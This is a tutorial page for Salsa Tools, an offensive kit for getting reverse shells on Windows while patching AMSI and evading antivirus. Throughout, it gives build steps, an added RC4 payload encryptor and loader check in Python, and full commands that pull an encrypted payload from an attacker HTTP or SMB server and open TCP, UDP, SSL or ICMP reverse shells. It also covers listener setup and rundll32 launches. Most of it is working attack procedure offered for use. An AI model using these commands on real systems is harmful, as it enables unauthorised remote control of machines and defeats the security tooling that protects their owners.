Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BindTCP plus AV bypass and AMSI patching

Salsa Tools is a collection of 3 different tools that, combined, allow you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written in C#. Salsa Tools was publicly released by Luis Vacas during his talk "Inmersión en la explotación tiene rima", which took place at h-c0n on 9th February 2019.

Features
* TCP/UDP/ICMP/DNS/BIND/SSL
* AV Safe (17th February)
* AMSI patchers
* PowerShell execution
* ...

Overview
Salsa-Tools is made from 3 different ingredients:
- EvilSalsa
- EncrypterAssembly
- SalseoLoader
Its behaviour is as follows:

Setup

Requirements
  • Visual Studio 2017 (or similar)
  • Python 2.7

Running la Salsa

Cooking EvilSalsa
(EvilSalsa ASCII banner) [+] That is our Payload
EvilSalsa is the main ingredient of this recipe. It contains the payload, which is executed on the system as follows: as soon as the payload starts, it loads System.Management.Automation.dll, which creates a runspace. Within that runspace we have the shell types TCP / UDP / ICMP / DNS / BINDTCP (the SalseoLoader usage banner below also lists ReverseSSL and a raw shellcode mode). Once EvilSalsa is loaded, the first thing it does is check for the existence of c:\windows\system32\amsi.dll. If it exists, it is patched using a homemade variant of the CyberArk and Rastamouse bypasses. Both of those bypasses patch the copy of amsi.dll mapped into the current process, not the file on disk, so the patch lives only as long as the process does.

Mixing EncrypterAssembly together with Evilsalsa
(EncrypterAssembly ASCII banner) [+] Software that encrypts the payload using RC4 [+] We have the version in python and the version in .exe
EncrypterAssembly can be used as a Python script or as an EXE binary. It encrypts the previously generated EvilSalsa with RC4 under the password you choose; the same password must later be given to SalseoLoader so it can decrypt the payload.
Python usage:
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
Executable usage:
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>

Bringing the Encrypted EvilSalsa to the tabular array amongst SalseoLoader
SalseoLoader is in charge of loading the encrypted payload. It can be compiled either as a library or as an executable. If it is run as an executable, the chosen arguments must be provided on the command line when the executable is run. If it is compiled as a library, the function "main" must be exported, and the arguments are passed through environment variables instead (see the rundll32 examples at the end of the tutorial).
(SalseoLoader ASCII banner) By: CyberVaca@HackPlayers
[+] Usage:
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[+] Shells available:
    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP

Tutorial

Compiling the binaries
Download the source code from GitHub and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.
Compile those projects for the architecture of the Windows box where you are going to use them (if the Windows box is x64, compile them for that architecture).
You can select the architecture inside Visual Studio in the left "Build" tab, under "Platform Target".
(If you can't find this option, click the "Project" tab and then "Properties".)


Then build both projects (Build -> Build Solution); the path of the resulting executable will appear in the build output:


Prepare the Backdoor
First of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the EncrypterAssembly project.

Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
Ok, now you have everything you need to run the whole Salseo thing: the encoded EvilSalsa.dll and the SalseoLoader binary. Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV... but note that claim is dated (the feature list says AV safe as of 17th February 2019), so check the public build against the target's AV before relying on it.
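The encryption step described in "Mixing EncrypterAssembly and EvilSalsa" and repeated here, together with the decrypt-and-check that SalseoLoader has to perform before it can load the assembly, as an added Python 3 example. This is not Salsa Tools' own code: it assumes the password bytes are used directly as the RC4 key and that the RC4 output is base64 text (so the blob can be served as a .txt over HTTP or SMB); the real tool's on-disk format may differ, so the two halves below interoperate only with each other. The sample "assembly" is a constructed MZ/PE header skeleton, not a real DLL.

```python
"""
Added example, not Salsa Tools' code: an EncrypterAssembly-style RC4 encryptor
plus the decrypt-and-validate half of what a SalseoLoader-style loader must do.

Assumptions (not taken from the page): key = raw password bytes, output =
base64 text, no integrity check beyond "does the result look like a PE".
"""
import base64
import struct
import sys


def rc4_crypt(data: bytes, key: bytes) -> bytes:
    """RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encrypt_assembly(assembly: bytes, password: str) -> str:
    """EncrypterAssembly role: RC4 under the password, then base64 text."""
    return base64.b64encode(rc4_crypt(assembly, password.encode())).decode("ascii")


def looks_like_pe(data: bytes) -> bool:
    """Sanity check a loader needs before Assembly.Load: an 'MZ' DOS header whose
    e_lfanew (offset 0x3C) points at a 'PE\\0\\0' signature. RC4 carries no
    integrity check, so a wrong password yields garbage; this is how to notice."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decrypt_assembly(blob_text: str, password: str) -> bytes:
    """SalseoLoader role: base64-decode, RC4-decrypt, refuse non-PE output."""
    plain = rc4_crypt(base64.b64decode(blob_text), password.encode())
    if not looks_like_pe(plain):
        raise ValueError("decrypted blob is not a PE image: wrong password or corrupt file")
    return plain


def constructed_fake_assembly() -> bytes:
    """Constructed sample input: a minimal MZ/PE header skeleton, not a real DLL."""
    img = bytearray(0x80)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)    # e_lfanew -> offset 0x40
    img[0x40:0x44] = b"PE\x00\x00"
    img[0x44:] = bytes(range(0x44, 0x80))      # filler standing in for the rest of the image
    return bytes(img)


def main(argv):
    # Same argument order as the page's usage line: <FILE> <PASSWORD> <OUTPUT_FILE>
    if len(argv) != 4:
        print(f"usage: {argv[0]} <FILE> <PASSWORD> <OUTPUT_FILE>")
        return 2
    with open(argv[1], "rb") as f:
        blob = encrypt_assembly(f.read(), argv[2])
    with open(argv[3], "w") as f:
        f.write(blob)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the page's argument order (the script name is a hypothetical one): python encrypt_assembly_example.py EvilSalsa.dll password evilsalsa.dll.txt. The PE check is the part worth copying: because RC4 alone has no authentication, a wrong password does not fail loudly, it just produces bytes that Assembly.Load would reject, so the loader should verify the header before handing the buffer to the runtime.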

Execute the backdoor

Getting a TCP reverse shell (downloading the encoded dll through HTTP)
Remember to start nc as the reverse shell listener, and an HTTP server to serve the encoded evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (downloading the encoded dll through SMB)
Remember to start nc as the reverse shell listener, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting a TCP reverse shell over SSL (using a local file)
Set up the listener on the attacker machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <Port> -tls1
Note that -tls1 pins the listener to TLS 1.0; if your OpenSSL build or distribution config refuses TLS 1.0, the handshake will fail, so drop the flag and retry.
Execute the backdoor:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

Getting an ICMP reverse shell (encoded dll already inside the victim)
This time you need a special tool on the attacker side (the client) to receive the reverse shell. Download: https://github.com/inquisb/icmpsh
Disable ICMP replies on the attacker machine, so the kernel does not answer the echo requests that icmpsh needs to handle itself:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#When you finish, you can enable them again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Execute the client:
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
Inside the victim, let's execute the salseo thing:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as a DLL exporting the main function
Open the SalseoLoader project using Visual Studio.

Before the main function add this line: [DllExport]


Install DllExport for this project
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...


Search for the DllExport package (using the Browse tab), and press Install (and accept the popup)


The files DllExport.bat and DllExport_Configure.bat will have appeared in your project folder

Uninstall DllExport
Press Uninstall (yeah, it's weird but trust me, it is necessary)


Exit Visual Studio and execute DllExport_Configure
Just exit Visual Studio
Then go to your SalseoLoader folder and execute DllExport_Configure.bat. Select x64 (if you are going to use it inside an x64 box, as in my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply


Open the project again with Visual Studio
[DllExport] should no longer be marked as an error


Build the solution
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)


Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)


To build the solution: Build --> Build Solution (the path of the new DLL will appear in the Output console)

Test the generated Dll
Copy and paste the DLL where you want to test it.
Execute:
rundll32.exe SalseoLoader.dll,main
If no error appears, you probably have a functional DLL!!

Get a musical rhythm using the Dll
Don't forget to run an HTTP server and set up a nc listener

Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Documented by https://github.com/carlospolop-forks/